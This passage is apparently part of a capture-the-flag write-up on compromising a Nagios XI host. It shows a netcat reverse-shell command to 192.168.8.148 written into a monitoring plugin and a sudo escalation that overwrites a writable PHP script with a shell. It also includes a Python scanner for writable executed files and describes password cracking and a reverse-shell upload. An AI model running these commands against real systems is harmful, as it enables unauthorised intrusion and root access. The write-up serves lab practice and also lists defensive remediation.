command_line /usr/bin/php /usr/local/nagiosxi/scripts/handle_nagioscore_event.php --handler-type=service --host="$HOSTNAME$" --service="$SERVICEDESC$" --hostaddress="$HOSTADDRESS$" --hoststate=$HOSTSTATE$ --hoststateid=$HOSTSTATEID$ --hosteventid=$HOSTEVENTID$ --hostproblemid=$HOSTPROBLEMID$ --servicestate=$SERVICESTATE$ --servicestateid=$SERVICESTATEID$ --lastservicestate=$LASTSERVICESTATE$ --lastservicestateid=$LASTSERVICESTATEID$ --servicestatetype=$SERVICESTATETYPE$ --currentattempt=$SERVICEATTEMPT$ --maxattempts=$MAXSERVICEATTEMPTS$ --serviceeventid=$SERVICEEVENTID$ --serviceproblemid=$SERVICEPROBLEMID$ --serviceoutput="$SERVICEOUTPUT$" --longserviceoutput="$LONGSERVICEOUTPUT$" --servicedowntime=$SERVICEDOWNTIME$
}
define command {
command_name xi_service_notification_handler
command_line /usr/bin/php /usr/local/nagiosxi/scripts/handle_nagioscore_notification.php --notification-type=service --contact="$CONTACTNAME$" --contactemail="$CONTACTEMAIL$" --type=$NOTIFICATIONTYPE$ --escalated="$NOTIFICATIONISESCALATED$" --author="$NOTIFICATIONAUTHOR$" --comments="$NOTIFICATIONCOMMENT$" --host="$HOSTNAME$" --hostaddress="$HOSTADDRESS$" --hostalias="$HOSTALIAS$" --hostdisplayname="$HOSTDISPLAYNAME$" --service="$SERVICEDESC$" --hoststate=$HOSTSTATE$ --hoststateid=$HOSTSTATEID$ --servicestate=$SERVICESTATE$ --servicestateid=$SERVICESTATEID$ --lastservicestate=$LASTSERVICESTATE$ --lastservicestateid=$LASTSERVICESTATEID$ --servicestatetype=$SERVICESTATETYPE$ --currentattempt=$SERVICEATTEMPT$ --maxattempts=$MAXSERVICEATTEMPTS$ --serviceeventid=$SERVICEEVENTID$ --serviceproblemid=$SERVICEPROBLEMID$ --serviceoutput="$SERVICEOUTPUT$" --longserviceoutput="$LONGSERVICEOUTPUT$" --datetime="$LONGDATETIME$"
}
One more point: the payload has to be detached with nohup and run in the background, because Nagios kills a check that exceeds its timeout and that would take the reverse shell down with it. nc -e also needs a netcat build that supports -e (nc.traditional, not the OpenBSD variant). The shebang makes the overwritten plugin runnable regardless of how Nagios invokes it, and redirecting with > keeps the file's existing execute bit.
printf '#!/bin/bash\nnohup nc -e /bin/bash 192.168.8.148 1111 &\n' > /usr/local/nagios/libexec/custom_check_mem
After about three minutes (the next scheduled run of check_local_mem) the shell came back
sudo privilege escalation
sudo -l
Many sudo entries can be run as root without a password

Check whether the corresponding files are writable
ls -liah /usr/local/nagiosxi/scripts/send_to_nls.php

send_to_nls.php is writable, so overwrite it with a PHP shell
echo "<?php system('/bin/bash'); ?>" > /usr/local/nagiosxi/scripts/send_to_nls.php
Then run it through the passwordless sudo rule to get root
sudo /usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php *
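Both escalation steps above come down to one question: which file does a command line actually execute, and can the current user write to it? The following added example (my code, not the box's and not part of Nagios) answers it for a commands.cfg: it parses the define command blocks, resolves $USERn$ from resource.cfg, strips the wrappers seen in the definitions above (/usr/bin/php $USER1$/x.php, . file && cmd, sudo script) to land on the file that really runs, and reports the ones the current user can modify. The same executables() helper applies unchanged to the command strings sudo -l prints, such as /usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php *. The default config paths in the usage block are assumptions; $USER1$=/usr/local/nagios/libexec is Nagios's stock value.

```python
import os
import re
import shlex
import sys

# Nagios resolves $USERn$ from resource.cfg; $USER1$ is the plugin directory by default.
# Used only as a fallback when no resource.cfg is readable.
DEFAULT_MACROS = {"USER1": "/usr/local/nagios/libexec"}

# Tokens that precede the file Nagios really executes: interpreters, sudo, and the
# shell "." (source) operator used by the check_xi_oracle* definitions.
WRAPPERS = {"php", "perl", "python", "python3", "sh", "bash", "sudo", "."}

DEFINE_RE = re.compile(r"define\s+command\s*\{(.*?)\}", re.S)
MACRO_RE = re.compile(r"\$(\w+)\$")


def parse_commands(cfg_text):
    """Return {command_name: command_line} from the text of a Nagios commands.cfg."""
    commands = {}
    for body in DEFINE_RE.findall(cfg_text):
        fields = {}
        for line in body.splitlines():
            line = line.strip()
            if not line or line.startswith(("#", ";")):
                continue
            parts = re.split(r"\s+", line, maxsplit=1)
            if len(parts) == 2:
                fields[parts[0]] = parts[1]
        if "command_name" in fields and "command_line" in fields:
            commands[fields["command_name"]] = fields["command_line"]
    return commands


def parse_resource_macros(resource_text):
    """Read $USERn$=value lines from resource.cfg."""
    macros = {}
    for line in resource_text.splitlines():
        m = re.match(r"\s*\$(USER\d+)\$\s*=\s*(.*?)\s*$", line)
        if m:
            macros[m.group(1)] = m.group(2)
    return macros


def executables(command_line, macros):
    """Resolve $USERn$ macros, blank the runtime macros ($HOSTADDRESS$, $ARGn$, ...)
    and return the absolute paths this command line executes or sources."""
    resolved = MACRO_RE.sub(lambda m: macros.get(m.group(1), ""), command_line)
    paths = []
    # Heuristic split on && and | so each simple command in a compound line is inspected.
    for segment in re.split(r"\s*(?:&&|\|\|?)\s*", resolved):
        try:
            tokens = shlex.split(segment)
        except ValueError:  # unbalanced quotes left behind by macro blanking
            tokens = segment.split()
        # Skip wrappers so "/usr/bin/php $USER1$/x.php" reports x.php, not php.
        while tokens and os.path.basename(tokens[0]) in WRAPPERS:
            tokens.pop(0)
        if tokens and tokens[0].startswith("/"):
            paths.append(tokens[0])
    return paths


def writable_targets(commands, macros):
    """Map command_name -> executed files the *current* user can modify.
    os.access uses the effective uid, so run this as the account you hold (www-data or nagios)."""
    findings = {}
    for name, line in commands.items():
        hits = [p for p in executables(line, macros)
                if os.path.isfile(p) and os.access(p, os.W_OK)]
        if hits:
            findings[name] = hits
    return findings


if __name__ == "__main__":
    # Assumed default locations; pass the paths `find / -name commands.cfg` reported instead.
    cfg = sys.argv[1] if len(sys.argv) > 1 else "/usr/local/nagios/etc/commands.cfg"
    res = sys.argv[2] if len(sys.argv) > 2 else "/usr/local/nagios/etc/resource.cfg"
    macros = dict(DEFAULT_MACROS)
    if os.path.isfile(res):
        with open(res) as fh:
            macros.update(parse_resource_macros(fh.read()))
    with open(cfg) as fh:
        commands = parse_commands(fh.read())
    for name, paths in sorted(writable_targets(commands, macros).items()):
        print(f"{name}: {' '.join(paths)}")
```

Run as the web-shell user it tells you which scheduled check to overwrite (here check_local_mem's custom_check_mem); run as nagios with the sudo -l command strings fed to executables() it tells you which NOPASSWD target (here send_to_nls.php) is really a writable script behind an interpreter. For a defender the output is the remediation list: every path printed should be root-owned and mode 0755, and interpreters should never appear in sudoers with a script argument the invoking user can write.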

Box summary
The web entry point of this box is hard: the brute-force volume is enormous, and the password sits more than ten million lines into rockyou. A tailored wordlist is the answer: cewl extracts the site's keywords and john's rules mangle them into a compact list that cracks the account quickly.
The usual WordPress-admin route of injecting a payload into the theme's 404 page does not work here either; instead the plugin uploader was used, with Burp intercepting the request to bypass the extension restriction and upload the reverse shell.